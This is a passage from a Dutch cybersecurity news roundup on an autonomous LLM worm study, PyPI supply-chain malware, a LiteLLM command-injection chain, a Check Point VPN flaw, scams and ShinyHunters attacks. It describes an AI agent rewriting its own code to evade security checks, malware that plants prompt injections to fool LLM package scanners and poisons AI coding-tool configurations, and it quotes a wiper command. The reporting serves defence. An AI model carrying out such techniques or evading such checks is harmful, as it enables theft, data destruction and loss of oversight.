Exploits die tijdens een enkele run werden gebruikt, omvatten een geketende SambaCry en een writable root cron privilege-escalatie, Dirty Pipe, PrintNightmare, Drupalgeddon 2, Exim RCE, blinde SQL-injectie, JWT-bypass, Redis escape en meer. Deze werden niet voorgeprogrammeerd, maar de agent redeneerde zich er naartoe op basis van wat het op elke host vond. De publicatie toont een volledige radiale propagatieboom over één run, met zes tot zeven generaties van verspreiding over Linux-, Windows- en IoT-hosts. Individuele exploitpogingen slaagden ongeveer 44% van de tijd. De meeste mislukkingen kwamen door een verkeerde payload-syntaxis, niet door gebrekkige logica. Exploits voor webapplicaties en privilege-escalatie voor Windows waren moeilijker dan lokale escalatie en service-exploits voor Linux, een capaciteitsbeperking die in de publicatie wordt behandeld als een huidige modelbeperking, en niet als een structurele verdediging.

De worm omzeilde zijn eigen trainingscutoff door publieke adviesteksten tijdens runtime te verwerken. Het exploiteerde succesvol testhosts die geconfigureerd waren met drie kwetsbaarheden die na de training van het model waren bekendgemaakt: CVE-2026-39987, een RCE voor pre-authenticatie in de Marimo Python notebook (CVSS 9.3); CVE-2026-31431 (CopyFail), een kwetsbaarheid voor privilege-escalatie in de Linux kernel (algif_aead-module) die CISA in mei aan zijn catalogus van bekende geëxploiteerde kwetsbaarheden toevoegde; en CVE-2026-43284 / CVE-2026-43500 (DirtyFrag), gerelateerde lokale privilege-escalatieproblemen in de Linux kernel. Tegen deze drie hosts verkreeg de worm root-toegang in 41 van de 67 pogingen.

CVE-2026-39987 werd op 8 april 2026 openbaar gemaakt. Sysdig observeerde exploitatie in honeypots 9 uur en 41 minuten daarna, en documenteerde afzonderlijk een realistische inbraak waarbij een aanvaller een LLM-agent gebruikte voor post-exploitatieactiviteiten na het compromitteren van een openbare Marimo-instantie. Dit toont dezelfde vertraging tussen patch en exploitatie, nu met een agent die het advies leest en op schaal probeert. De relevantie van WannaCry ligt in de patch-gap, niet in de 'blast radius'. EternalBlue was al maanden gepatcht voordat WannaCry toesloeg. De publicatie maakt hetzelfde punt onder een andere voorwaarde, een adaptieve worm kan nieuwe paden blijven testen terwijl verdedigers nog bezig zijn met het valideren van fixes.

Twee aspecten maken deze worm moeilijker te beheersen dan een traditionele worm. Ten eerste verschuiven de kosten van gehuurde API-toegang naar de rekenkracht die de worm kan vastleggen. Zodra er een GPU-compatibele slachtofferinfrastructuur bestaat, betaalt de aanvaller niet langer per poging. Ten tweede, omdat alles draait op open-weight modellen zonder afhankelijkheid van een leverancier, missen controles aan de providerzijde het kernprobleem. Dienstweigeringen, snelheidsbeperkingen, accountopschorting, niets hiervan is van toepassing. Er is geen API-sleutel om in te trekken. Beperking moet plaatsvinden op netwerk- en hostniveau.

De onderzoekers observeerden ook dat de worm bij verschillende gelegenheden zijn eigen code herschreef om lokale beveiligingscontroles in de testomgeving te omzeilen, gedrag waarvoor ze nooit hadden geprogrammeerd. De huidige versie is opzettelijk gebouwd zonder stealth-functies, zoals encryptie, polymorfe code, persistentie mechanismen of de opschoning van logboeken. Een kwaadaardige variant met persistentie, versleutelde payloads, proces-masquerading en logboekopschoning zou verdedigers minder mogelijkheden bieden.

Bron: Sysdig | Bron 2: cleverhans.io

De Fraudehelpdesk ontvangt opnieuw meldingen over valse e-mails die uit naam van Europol worden verstuurd. Deze berichten beschuldigen de ontvanger van het bezit van kinderporno en zijn opgesteld als een officiële gerechtelijke brief. Bij de e-mail is een PDF-bestand gevoegd waarin de beschuldiging nogmaals gedetailleerd wordt uiteengezet.

De oplichters zetten de ontvangers onder zware druk door te stellen dat er binnen 24 uur gereageerd moet worden om de onschuld te bewijzen. Een van de melders gaf aan specifiek beschuldigd te worden van het verspreiden van kinderporno. In deze specifieke e-mail, eveneens afkomstig van 'Europol', werd de ontvanger gesommeerd om het paspoort op te sturen naar een adres in Frankrijk. Indien dit niet binnen de gestelde termijn van 24 uur zou gebeuren, dreigden de oplichters met een boete van 500.000 euro.

Andere slachtoffers van deze oplichtingspraktijk meldden dat zij twee opties kregen voorgelegd, ofwel het betalen van een boete binnen 48 uur, ofwel vervolging door justitie in een openbare rechtszaak. Dit illustreert de intimiderende tactieken die worden gebruikt om slachtoffers tot snelle actie te dwingen en hen geld afhandig te maken.

De Fraudehelpdesk benadrukt dat deze e-mails vals zijn en adviseert ontvangers om er niet op in te gaan. De berichten dienen direct uit de mailbox verwijderd te worden. Personen die dergelijke e-mails ontvangen, worden verzocht dit te melden bij de Fraudehelpdesk. Indien men toch geld heeft overgemaakt of persoonlijke gegevens heeft gedeeld, wordt geadviseerd direct contact op te nemen met de Fraudehelpdesk voor persoonlijk advies en verdere ondersteuning.

Bron: Fraudehelpdesk

De Miasma supply chain campagne heeft een nieuwe aanvalsgolf ontketend, genaamd Hades, waarbij 37 kwaadaardige 'wheel' artefacten zijn betrokken verspreid over 19 pakketten in de Python Package Index (PyPI) registry. Deze aanvallen, in de stijl van Mini Shai-Hulud, worden verder verfijnd en opgesplitst om specifieke ecosystemen te viseren.

Volgens een analyse van Socket bevatten de gecompromitteerde releases een `*-setup.pth` bestand dat automatisch probeert uit te voeren tijdens het opstarten van Python. Dit bestand downloadt de Bun JavaScript-runtime en voert vervolgens een geobfusceerde JavaScript-payload uit, genaamd `_index.js`. Deze payload is ontworpen om inloggegevens te stelen.

De geïdentificeerde pakketten omvatten: `bramin` (versies 0.0.2, 0.0.3, 0.0.4), `cmd2func` (0.2.2, 0.2.3), `executor-engine` (0.3.4, 0.3.5), `executor-http` (0.1.3, 0.1.4), `funcdesc` (0.2.2, 0.2.3), `magique-ai` (0.4.4, 0.4.5), `napari-ufish` (0.0.2, 0.0.3), `pantheon-agents` (0.6.1, 0.6.2), en `pantheon-toolsets` (0.5.5, 0.5.6).

Net als in de eerdere Shai-Hulud en Miasma campagnes downloadt en installeert de kwaadaardige payload de Bun JavaScript-runtime. Deze runtime wordt vervolgens gebruikt om een zwaar geobfusceerde JavaScript-stealer te lanceren die een breed scala aan gegevens van ontwikkelaarssystemen kan verzamelen. Dit omvat geheimen gekoppeld aan GitHub, npm, PyPI, RubyGems, JFrog, CircleCI, Anthropic, AWS, GCP, Azure en Kubernetes. Daarnaast worden Docker-configuraties, Vault-tokens, SSH-sleutels, shell-geschiedenis, `.env` bestanden, `.npmrc` bestanden, `.pypirc` bestanden, Claude/MCP-configuraties en andere lokale of 'runner'-toegankelijke inloggegevens gestolen.

Een opvallende verandering in deze campagne is de markering. Eerdere iteraties exporteerden de verzamelde gegevens naar een openbare GitHub-repository met beschrijvingen als "Miasma: The Spreading Blight". De nieuwste golf gebruikt repositorybeschrijvingen zoals "Hades - The End for the Damned" en "Hades * The End for the Damned". Volgens het applicatiebeveiligingsbedrijf Socket moet Hades dan ook worden gezien als een PyPI-tak van dezelfde Mini Shai-Hulud / Miasma-lijn, en niet als een op zichzelf staand incident met malware voor Python. De kernwerkwijze blijft hetzelfde, namelijk misbruik maken van vertrouwde pakketkanalen, uitvoeren vóór normaal pakketgebruik, een Bun-aangedreven JavaScript-payload en het stelen van inloggegevens van ontwikkelaars en CI/CD-omgevingen, met exfiltratie en propagatie gericht op GitHub.

De campagne van Hades onderscheidt zich door het gebruik van een `*-setup.pth` bestand dat door de "site"-module van Python wordt verwerkt tijdens het opstarten van de interpreter. Dit resulteert in de uitvoering van de kwaadaardige payload na installatie, zonder dat het slachtoffer het vergiftigde pakket hoeft te importeren. De payload downloadt en draait vervolgens Bun van GitHub en voert de stealer uit, maar niet voordat wordt gecontroleerd of het systeem overeenkomt met de Russische locale. Socket legt uit dat dit het Python-equivalent is van het probleem met npm install-hooks, waarbij de installatie van afhankelijkheden leidt tot uitvoering voordat applicatiecode wordt beoordeeld of aangeroepen.

Een cluster van pakketten binnen de campagne van Hades richt zich ook op het ecosysteem van computationele biologie, bio-informatica en genotype-fenotype-analyse, zoals `mflux-streamlit`. Deze cluster hanteert een andere aanpak, waarbij het toegangspunt is ingebed in het `__init__.py` bestand van het pakket als een geobfusceerde import-hook van één regel. De uitkomst is echter hetzelfde, namelijk het downloaden en uitvoeren van de Bun-runtime, gevolgd door de uitvoering van de JavaScript-payload. StepSecurity merkt op dat het gebruik van de Bun-runtime een consistent thema blijft, omdat het downloaden van Bun als een standalone ZIP-bestand de malware in staat stelt complexe JavaScript-taken uit te voeren in omgevingen zonder een Node.js-installatie, waardoor traditionele pakketbeheercontroles en netwerkproxy-logs worden omzeild.

In een nieuwe ontwijkingsmethode voor AI-beveiliging, neemt de malware ook een promptinjectie in platte tekst op die probeert pakketanalysehulpmiddelen gebaseerd op Large Language Models (LLM's) te misleiden om het pakket als veilig te classificeren. Bovendien bevraagt de malware GitHub-commits naar het trefwoord "TheBeautifulSnadsOfTime" om een Base64-gecodeerde string met een JavaScript-payload te extraheren. Het peilt ook GitHub naar commits die overeenkomen met het trefwoord "firedalazer" om een dropper gebaseerd op Python op te halen en uit te voeren.

Belangrijke functies van de malware voor Hades zijn replicatie en laterale verspreiding over ontwikkelaarsnetwerken via SSH of SCP, het pushen van getrojaniseerde PyPI-pakketten van gecompromitteerde systemen door misbruik te maken van de OpenID Connect (OIDC) vertrouwensconfiguraties van ontwikkelaars. Het richten op GitHub-repositories om organisatiegeheimen te extraheren met behulp van GitHub Actions runners als het gestolen GitHub-token de juiste schrijfrechten heeft. Het backdooren van lokale werkruimtemappen om code-uitvoering te activeren wanneer geanalyseerd door AI-assistenten of geopend in IDE's, waaronder Anthropic Claude, OpenAI Codex, Google Gemini, Microsoft Copilot, Cline, Aider, Tabby, Amazon Q, Cody en Bolt. Ook wordt een achtergronddienst genaamd "gh-token-monitor" geïnstalleerd die fungeert als een 'wiper', door alle gegevens te verwijderen (`rm -rf ~/; rm -rf ~/Documents`) als het gestolen GitHub-token door de ontwikkelaar wordt ingetrokken.

Beveiligingsonderzoeker Rohan Prabhu benadrukt dat de Miasma-actor de mogelijkheid heeft om het procesgeheugen van de GitHub Actions runner (het Runner.Worker-proces) te lezen om geheimen te extraheren. In eerdere campagnes was dit beperkt tot Linux systemen via `/proc/{pid}/mem`. De campagne van Hades introduceert op maat gemaakte geheugenschrapers voor macOS en Windows. Deze ontwikkeling komt terwijl StepSecurity onthulde dat een onbekende aanvaller het GitHub-account ("LeonOstrez") gekoppeld aan "Pythagora-io/gpt-pilot", een populaire open-source AI-ontwikkelaarstool, heeft gecompromitteerd en een variant van de Shai-Hulud credential-stealing worm naar de main-branch heeft gepusht.

Bron: Socket.dev | Bron 2: github.com | Bron 3: snyk.io

Het Nationaal Cyber Security Centrum (NCSC) heeft een urgente waarschuwing uitgegeven over de verwachting van een snelle en grootschalige exploitatie van een kritieke kwetsbaarheid in de Remote Access VPN- en Mobile Access-producten van Check Point. Deze kwetsbaarheid, die al werd misbruikt voordat een officiële patch beschikbaar kwam, vormt een aanzienlijk risico voor organisaties die deze VPN-oplossingen inzetten. Check Point zelf heeft de eerste waargenomen aanvallen gedateerd op 7 mei, en rapporteerde een significante toename van kwaadaardige activiteiten begin juni.

De betreffende kwetsbaarheid stelt een ongeauthenticeerde aanvaller in staat om, zonder de noodzaak van geldige inloggegevens, een verbinding op te zetten met de VPN-omgeving van een organisatie. Dit kan potentiële toegang verschaffen tot het interne bedrijfsnetwerk. Het lek is specifiek van toepassing op configuraties die het IKEv1 key exchange protocol gebruiken. Het NCSC benadrukt dat IKEv1 weliswaar een verouderd protocol is, maar dat het desondanks nog veelvuldig wordt ingezet in diverse implementaties.

Nu de patch is uitgebracht en er meer gedetailleerde technische informatie over de kwetsbaarheid beschikbaar is, anticipeert het NCSC op een snelle escalatie naar grootschalige exploitatiepogingen. Daarom roept de overheidsinstantie organisaties met klem op om onmiddellijk actie te ondernemen. De primaire aanbeveling is om de officiële advies van Check Point zorgvuldig te bestuderen en de daarin beschreven mitigatiemaatregelen toe te passen.

Verder adviseert het NCSC organisaties dringend om hun systemen te controleren op Indicators of Compromise (IoC's) die door Check Point zijn gedeeld. Deze controle is van cruciaal belang voor omgevingen waar de kwetsbare producten in gebruik zijn en waar het IKEv1-protocol is ingeschakeld, om zo eventuele eerdere of huidige compromitteringen te identificeren. Het snel patchen en controleren van systemen is essentieel om potentiële verdere schade te voorkomen en de digitale weerbaarheid te waarborgen.

Bron: NCSC

De U.S. Cybersecurity and Infrastructure Security Agency (CISA) heeft recentelijk een kwetsbaarheid met hoge ernst in BerriAI LiteLLM toegevoegd aan haar catalogus van bekend misbruikte kwetsbaarheden (KEV), wat duidt op actieve exploitatie. Deze kwetsbaarheid, aangeduid als CVE-2026-42271 en met een CVSS-score van 8.7, betreft een command injectie kwetsbaarheid die een geauthenticeerde gebruiker in staat stelt willekeurige commando's op de host uit te voeren.

De kwetsbaarheid treft specifieke versies van het LiteLLM Python-pakket. Volgens BerriAI accepteerden twee endpoints die werden gebruikt om een MCP-server te testen vóór het opslaan - `POST /mcp-rest/test/connection` en `POST /mcp-rest/test/tools/list` - een volledige serverconfiguratie in de aanvraagbody. Deze configuratie omvatte velden zoals `command`, `args` en `env`, die door het stdio-transport werden gebruikt. Bij een aanroep met een stdio-configuratie probeerden de endpoints verbinding te maken, wat het opgegeven commando als een subproces op de proxy-host uitvoerde met de rechten van het proxy-proces.

De beheerders van de open-source AI-gateway en Python SDK gaven aan dat deze endpoints alleen waren beveiligd met een geldige proxy API-sleutel. Dit betekende dat elke geauthenticeerde gebruiker, inclusief interne gebruikers met privileged sleutels, willekeurige commando's kon uitvoeren op een kwetsbaar systeem. Met de patches die in versie 1.83.7 zijn uitgebracht, vereisen beide test-endpoints nu de PROXY_ADMIN-rol, wat de beveiliging consistent maakt met het save-endpoint.

Onderzoeksbureau Horizon3.ai heeft recentelijk aangetoond dat CVE-2026-42271 kan worden gekoppeld aan CVE-2026-48710, een kwetsbaarheid voor omzeiling van host header validatie in Starlette, een lichtgewicht Asynchronous Server Gateway Interface (ASGI) framework. Deze keten maakt het mogelijk om authenticatie volledig te omzeilen en ongeauthenticeerde remote code-executie (RCE) te bereiken tegen kwetsbare LiteLLM-implementaties. CVE-2026-48710 (CVSS-score: 6.5) kan worden gebruikt om het authenticatiemechanisme in LiteLLM-implementaties met Starlette-versies ≤ 1.0.0 volledig te omzeilen. Hierdoor wordt de kwetsbaarheid omgezet in ongeauthenticeerde RCE zonder dat credentials vereist zijn.

Een succesvolle aanval met deze exploit-keten, die een gecombineerde CVSS-score van 10.0 heeft en daarmee als kritiek wordt beschouwd, kan aanvallers in staat stellen willekeurige commando's uit te voeren op de LiteLLM-host. Dit kan leiden tot toegang tot credentials van modelproviders, het stelen van API-sleutels en geheimen die door de proxy zijn opgeslagen, laterale verplaatsing binnen verbonden AI-infrastructuur, en zelfs de compromittering van downstream systemen die met de gateway zijn geïntegreerd.

Momenteel is er geen informatie beschikbaar over de specifieke wijze waarop CVE-2026-42271 wordt misbruikt, de identiteit van de dreigingsactoren, de doelwitten van de aanvallen, de omvang van de exploitatie, of de vraag of de waargenomen activiteit daadwerkelijk tot compromittering heeft geleid. Het is ook onduidelijk of de in het wild waargenomen aanvallen gebruikmaken van de gehele exploit-keten.

Gebruikers wordt geadviseerd LiteLLM te updaten naar versie 1.83.7 of hoger en Starlette naar versie 1.0.1 of hoger. Als directe patching geen optie is, worden de volgende mitigerende maatregelen aanbevolen, namelijk het blokkeren van `POST /mcp-rest/test/connection` en `POST /mcp-rest/test/tools/list` bij de reverse proxy of API gateway, het beperken van netwerktoegang tot vertrouwde segmenten, het rouleren van credentials die door de proxy zijn opgeslagen, en het controleren van logs op ongebruikelijke Host header-activiteit en gebeurtenissen van subprocesexecutie. Deze ontwikkeling volgt kort op een eerdere kritieke SQL-injectie kwetsbaarheid in LiteLLM (CVE-2026-42208, CVSS-score: 9.3) die binnen 36 uur na openbaarmaking actief werd misbruikt.

Bron: Horizon3.ai | Bron 2: github.com | Bron 3: cisa.gov

Een dreigingsactor, bekend onder de naam BellaSwanLeak, biedt op een darkwebforum een dataset aan die volgens de verkoper afkomstig is van het korte videoplatform TikTok. De actor claimt een omvangrijke hoeveelheid van circa 2,46 miljard gebruikersrecords in bezit te hebben, specifiek 2.461.892.091 records. Deze dataset zou gevoelige informatie bevatten, waaronder gebruikersnamen, volledige namen, e-mailadressen, telefoonnummers, geboortedata, geslacht en het land van herkomst. Om de authenticiteit van de data te bewijzen, heeft de dreigingsactor een sample geplaatst met een downloadlink.

De claim van BellaSwanLeak is echter nog niet geverifieerd. De aanbieder zelf benadrukt dat het gaat om gescrapete data en dat TikTok niet gehackt is. De data zou op 5 juni 2026 zijn gelekt en wordt actief gepromoot met samples.

 Het aantal van 2,46 miljard records overschrijdt aanzienlijk de publiek gerapporteerde actieve gebruikersbasis van TikTok. Dit suggereert dat de dataset mogelijk duplicaten, samengevoegde records, historische verzamelingen of verrijkte data uit eerdere bronnen kan bevatten. De aanwezigheid van grote aantallen records op cybercrimefora is geen uitzondering, maar vereist altijd uitgebreide validatie voordat de betrouwbaarheid van de data kan worden vastgesteld.

Dit is niet de eerste keer dat dergelijke claims rondom TikTok de ronde doen. In 2022 beweerde een andere actor reeds 2 miljard TikTok records, inclusief broncode, in handen te hebben. Destijds ontkende TikTok dat er sprake was van een datalek. Voor gebruikers van TikTok geldt het dringende advies alert te zijn op mogelijke phishingpogingen via e-mail en telefoon, aangezien gescrapete contactgegevens vaak worden misbruikt voor dergelijke frauduleuze activiteiten.

Bron: Cybercrimeinfo

Het betreft de tweede opeenvolgende advertentie van vermeende zerodays door deze actor.

Het eerste onderdeel van de aangeboden exploit, genaamd GEF Breacher, claimt een bevestigde omzeiling te leveren van de edge firewall en de web application firewall bescherming van Google. Naast deze exploit beweert Orcinus in dezelfde reeks ook master keys van Wickr Enterprise aan te bieden, evenals infrastructuurdata van Eero en Shopify.

De exploit wordt aangeboden voor 3 bitcoin, terwijl de infrastructuurdata beschikbaar zou zijn voor 1,2 bitcoin. Het is belangrijk te benadrukken dat alle claims van Orcinus niet geverifieerd zijn. Er is geen onafhankelijke bevestiging dat de exploit daadwerkelijk werkt of dat de aangeboden data authentiek is. Advertenties van dit type op criminele fora blijken regelmatig overdreven of zelfs volledig vals te zijn. Desondanks illustreert de advertentie de aanhoudende criminele interesse in het omzeilen van cloudbeveiliging en de potentiële risico's voor organisaties die afhankelijk zijn van dergelijke beschermingslagen.

Bron: Cybercrimeinfo

Google staat op het punt om de functionaliteit van extensies voor adblockers in zijn Chrome browser aanzienlijk te wijzigen. Deze aanpassing houdt in dat extensies voor adblockers niet langer zelf het internetverkeer kunnen inspecteren. In plaats daarvan moeten de extensies een beperkte lijst met filterregels aan de browser van Google aanleveren. Dit betekent dat de effectiviteit van het blokkeren van advertenties mogelijk afneemt, waardoor er meer advertenties doorkomen.

De wijziging heeft potentieel grote gevolgen voor gebruikers, waaronder die in Nederland en België, die vertrouwen op adblockers voor een veiligere en minder opdringerige online ervaring. Adblockers spelen een cruciale rol in het tegengaan van malvertising, waarbij cybercriminelen kwaadaardige advertenties gebruiken om malware te verspreiden of gebruikers naar phishing-websites te leiden. Een verzwakte blokkering kan de blootstelling aan dergelijke dreigingen vergroten.

Gebruikers die zich zorgen maken over deze ontwikkeling, zullen mogelijk alternatieve methoden moeten overwegen om hun online privacy en veiligheid te waarborgen. De exacte impact en de mate waarin advertenties en potentiële dreigingen zullen toenemen, zullen duidelijk worden zodra de wijziging volledig is doorgevoerd. De kern van de aanpassing is de verschuiving in controle, van een actieve inspectie door de extensie naar een passievere rol, waarbij de extensie afhankelijk is van de filteringmogelijkheden van de browser zelf.

Bron: Google

De broncode van de Miasma-worm, een aanvalsframework dat inloggegevens steelt en recentelijk open source ecosystemen heeft getarget via supply chain aanvallen, is kortstondig openbaar gemaakt op GitHub. Miasma wordt beschouwd als een evolutie van de eerdere Shai-Hulud-worm, waarvan de code eerder ook al op GitHub was gelekt en die veel van dezelfde functionaliteiten, technieken en zelfs code deelt.

De malware infecteert een ontwikkelaarsmachine, steelt de bouwomgeving en cloud-inloggegevens, en gebruikt deze vervolgens om legitieme repositories en pakketten te compromitteren. Hierna publiceert de malware getrojaniseerde versies om stroomafwaartse ontwikkelaars te infecteren en de cyclus te herhalen. Dit autonome, wormachtige zelfverspreidingsmechanisme kan zijn bereik snel vergroten, waardoor een enkele inbreuk potentieel kan uitgroeien tot een wijdverspreide supply chain aanval.

Miasma is eerder in verband gebracht met spraakmakende aanvallen op npm pakketten van Red Hat en, recenter, op 73 Microsoft-repositories op GitHub. Onderzoekers van SafeDep rapporteerden gisteren dat de Miasma-broncode via tal van gecompromitteerde ontwikkelaarsaccounts op GitHub was gelekt. In elk van deze accounts publiceerden de dreigingsactoren de broncode in een repository genaamd "Miasma-Open-Source-Release". Dit duidt erop dat de broncode opzettelijk is vrijgegeven, vergelijkbaar met de eerdere publicatie van de Shai-Hulud-code.

Een analyse van de code toonde aan dat het toolkit geen command and control (C2) infrastructuur nodig heeft om te functioneren, aangezien het GitHub hiervoor gebruikt. Het framework verzamelt inloggegevens van cloud-providers, CI/CD-systemen, wachtwoordbeheerders, Kubernetes en secret stores. Deze inloggegevens worden misbruikt om npm-, PyPI- en RubyGems-pakketten te compromitteren, evenals GitHub-repositories, GitHub Actions workflows en JFrog Artifactory-instanties. Bovendien kan Miasma lateraal bewegen via SSH en AWS Systems Manager (SSM) en configuraties van AI-coderingstools zoals Claude, Gemini, Cursor, Copilot, Kiro en Cline vergiftigen.

Een opvallende functie die in de gelekte Miasma-broncode is ontdekt, is een "dead-man switch" die wordt geïnstalleerd wanneer de malware een gestolen GitHub-token van een slachtoffer gebruikt als exfiltratiekanaal. Dit onderdeel controleert elke minuut de geldigheid van het token en, indien ingetrokken, voert een destructief commando uit (rm -rf ~/; rm -rf ~/Documents) dat recursief bestanden en mappen in de home- en documentenmappen van de gebruiker verwijdert. De monitor draait als een systemd-gebruikersservice op Linux of een LaunchAgent op macOS en blijft tot 72 uur actief.

Een ander interessant aspect is een vijfstappen bouw-pipeline die unieke payloads genereert voor elke build. SafeDep meldt dat dit proces AES-256-GCM-encryptie per bestand van ingebedde assets combineert met gerandomiseerde string-obfuscatie, bron-transformaties, JavaScript-obfuscatie en een zelfuitpakkende loader die de uiteindelijke payload in drie lagen encryptie verpakt. Willekeurige sleutels en een gerandomiseerde buitenste coderingslaag zorgen ervoor dat elk gegenereerd sample verschilt van eerdere builds, wat detectie op basis van handtekeningen en statische analyse bemoeilijkt.

Het lek van Shai-Hulud leidde tot de release van geavanceerdere varianten, zoals Miasma, en tot hogere aanvalsfrequenties. Op dezelfde manier wordt verwacht dat het lek van de Miasma-broncode een vergelijkbaar effect zal hebben, aangezien dreigingsactoren de code zullen adopteren en verder aanpassen. Dit kan aanzienlijke gevolgen hebben voor de beveiliging van het open source ecosysteem, aangezien supply chain aanvallen dit ecosysteem in een ongekend tempo blijven targeten. Software-ontwikkelaars wordt geadviseerd om projectafhankelijkheden vast te zetten, vertragingen van meerdere dagen in te voeren voordat nieuw uitgebrachte pakketupdates worden geadopteerd, en nieuwe builds te valideren in geïsoleerde testomgevingen.

Bron: SafeDep | Bron 2: hubs.li

GitHub heeft aangekondigd dat npm v12, dat naar verwachting volgende maand wordt uitgebracht, aanzienlijke beveiligingswijzigingen zal introduceren. Deze aanpassingen zijn gericht op het tegengaan van supplychainaanvallen die misbruik maken van gedragingen die worden geactiveerd door het `npm install`-commando. Dit commando wordt gebruikt om de afhankelijkheden van een project te downloaden en te installeren, en om eventuele installatiegerelateerde scripts uit te voeren die door de pakketten zijn gedefinieerd. Ontwikkelaars voeren dit commando uit na het klonen van een project, het ophalen van updates of tijdens CI/CD-builds. Aanvallers richten zich hierop vanwege het potentieel voor geautomatiseerde code-uitvoering tijdens de pakketinstallatie.

De kern van de aankondiging is dat code-uitvoering en niet-registerafhankelijke bronnen die momenteel automatisch worden geactiveerd tijdens `npm install`, nu expliciete goedkeuring zullen vereisen in plaats van standaard te worden vertrouwd. Specifiek heeft GitHub de volgende wijzigingen bekendgemaakt:

Vanaf versie 12 zal `npm install` geen `preinstall`, `install` of `postinstall` scripts van afhankelijkheden uitvoeren, tenzij deze expliciet zijn goedgekeurd. Dit geldt ook voor native module-builds die via `node-gyp` worden geactiveerd, en `prepare`-scripts van Git-, lokale bestands- en gekoppelde afhankelijkheden. Daarnaast zal `npm install` geen afhankelijkheden meer ophalen uit Git-repositories, zowel directe als transitieve, tenzij dit expliciet is toegestaan. GitHub stelt dat dit een pad voor code-uitvoering elimineert waarbij het `.npmrc`-bestand van een Git-afhankelijkheid de gebruikte Git-executable zou kunnen wijzigen, zelfs als installatiescripts zijn uitgeschakeld. Tot slot zullen afhankelijkheden die zijn geïnstalleerd vanaf externe URL's, zoals HTTPS-tarballs, niet langer worden opgelost tenzij dit expliciet is toegestaan. Dit geldt voor zowel directe als transitieve afhankelijkheden.

Deze veranderingen kunnen supplychainaanvallen aanzienlijk verminderen door de automatische uitvoering van installatiescripts, de automatische resolutie van Git-gebaseerde afhankelijkheden en de automatische resolutie van externe URL-afhankelijkheden te verwijderen. De nieuwe standaardinstellingen hadden diverse aanvalstechnieken die in recente supplychainaanvallen werden gebruikt, kunnen verstoren. Voorbeelden hiervan zijn campagnes met kwaadaardige `preinstall`/`postinstall` scripts die gericht waren op `eslint-config-prettier`, Toptal's Picasso-pakketten, tientallen datastelende npm pakketten, evenals misbruik van Git-afhankelijkheden zoals gedocumenteerd in de Shai-aanvallen met Hulud.

Projecten die voor legitieme workflows afhankelijk zijn van deze gedragingen, moeten expliciet opt-in geven voordat ze upgraden naar npm v12. GitHub adviseert ontwikkelaars om zich voor te bereiden door te upgraden naar npm 11.16.0 of nieuwer. Deze versies geven waarschuwingen weer bij alle acties die onder versie 12 zullen worden verbroken. Dit stelt ontwikkelaars in staat om deze waarschuwingen te beoordelen en afhankelijkheden of workflows te identificeren die expliciete goedkeuring zullen vereisen vóór de upgrade. Na de upgrade naar versie 12 zullen alleen expliciet goedgekeurde scripts en afhankelijkheidsbronnen automatisch blijven functioneren. Er is een communitydiscussie geopend waar ontwikkelaars hun suggesties over de aankomende wijzigingen kunnen delen.

Bron: GitHub | Bron 2: hubs.li

De beruchte ShinyHunters afpersingsgroep claimt data te hebben gestolen van meer dan honderd organisaties via aanvallen op Oracle PeopleSoft servers. Het gaat hierbij om zowel op de cloud gebaseerde als on-premise implementaties van de PeopleSoft bedrijfssoftware, die door grote organisaties wordt gebruikt voor het beheer van bedrijfsprocessen zoals human resources, salarisadministratie, financiën, supply chain management en studentenadministratie.

Gisteren kwamen details naar buiten over deze grootschalige data diefstal aanvallen, waarbij getroffen klanten afpersingsberichten ontvingen die waren ondertekend door ShinyHunters. Vandaag heeft de dreigingsactor aan BleepingComputer bevestigd verantwoordelijk te zijn voor de aanvallen. Ze beweren data te hebben buitgemaakt van 300 PeopleSoft instanties bij meer dan 100 organisaties.

Volgens ShinyHunters maken ze gebruik van een "gadget chain" van zowel verouderde als zeroday kwetsbaarheden om de aanvallen uit te voeren. De groep merkt op dat de aanval niet op alle systemen werkt en vermoedt dat het succes afhangt van de configuratie van een specifieke PeopleSoft-instantie. Oracle is benaderd voor commentaar over een mogelijk misbruikte zeroday kwetsbaarheid, maar heeft nog niet gereageerd.

De dreigingsactor stelt dat de meeste getroffen organisaties in de onderwijssector actief zijn, waarvan velen al eerder zijn afgeperst. ShinyHunters beweerde aanvankelijk een FBI-portaal, dat ook op PeopleSoft draait, te willen hacken om een verklaring te publiceren en "misinformatie recht te zetten". Deze poging is echter mislukt.

De Universiteit van Nottingham is een van de slachtoffers van deze aanvallen, en de data van de universiteit is reeds gepubliceerd op de data lek site van ShinyHunters. De universiteit heeft vandaag een verklaring uitgegeven waarin het cybersecurity incident wordt bevestigd.

Ondanks het uitblijven van publieke informatie van Oracle, heeft cybersecurity onderzoeker "Michael R" diverse online directories ontdekt die tooling bevatten die gerelateerd is aan deze aanvalscampagne. De onderzoeker meldde dat "ShinyHunters, (of een groep die hen imiteert) verschillende directories heeft blootgelegd die de voortdurende targeting van PeopleSoft (Enterprise Resource Planning software) omgevingen onthullen." Ook waren staging materialen zichtbaar, waaronder MeshCentral agents, en een script voor het aanpassen van websites en het stelen van inloggegevens.

Michael R deelde de volgende IP-adressen als Indicators of Compromise (IOCs) die verband houden met deze aanvallen:

142.11.200[.]186

142.11.200[.]187

142.11.200[.]188

142.11.200[.]189

142.11.200[.]190

108.174.202[.]99

176.120.22[.]24

Sommige van deze IP-adressen gebruikten een TLS-certificaat met de common name "azurenetfiles[.]net", een domein dat eerder in verband werd gebracht met de ShinyHunters afpersingsgroep. Vijf van de servers toonden een .bash_history-bestand dat inzicht gaf in de aanvallen, waaronder een shell script dat is ontworpen om een losgeldbriefje met de naam "README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT" aan te maken op een interne PeopleSoft-server na een succesvolle inbraak.

Het script analyseert het /etc/hosts-bestand om PeopleSoft-gerelateerde systemen te identificeren en probeert verbinding te maken via SSH met behulp van veelvoorkomende PeopleSoft en Oracle administratieve accounts zoals 'psoft', 'oracle' en 'linuxadm'. Als wachtwoordverificatie mislukt, probeert het script terug te vallen op authenticatie via SSH-sleutels. Eenmaal verbonden plaatst het script het losgeldbriefje in directories die geassocieerd zijn met PeopleSoft web en applicatieservers.

Organisaties die Oracle PeopleSoft gebruiken, wordt dringend geadviseerd om hun logs te analyseren op verbindingen vanaf de bovengenoemde IP-adressen om vast te stellen of zij het doelwit waren van deze aanvallen. Indien deze IOCs worden aangetroffen, dienen organisaties onmiddellijk een incidentrespons te starten, te onderzoeken of hun PeopleSoft-instantie is gecompromitteerd, en te overwegen getroffen servers tijdelijk van internettoegang te verwijderen totdat de omgeving kan worden beveiligd en gecontroleerd.

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

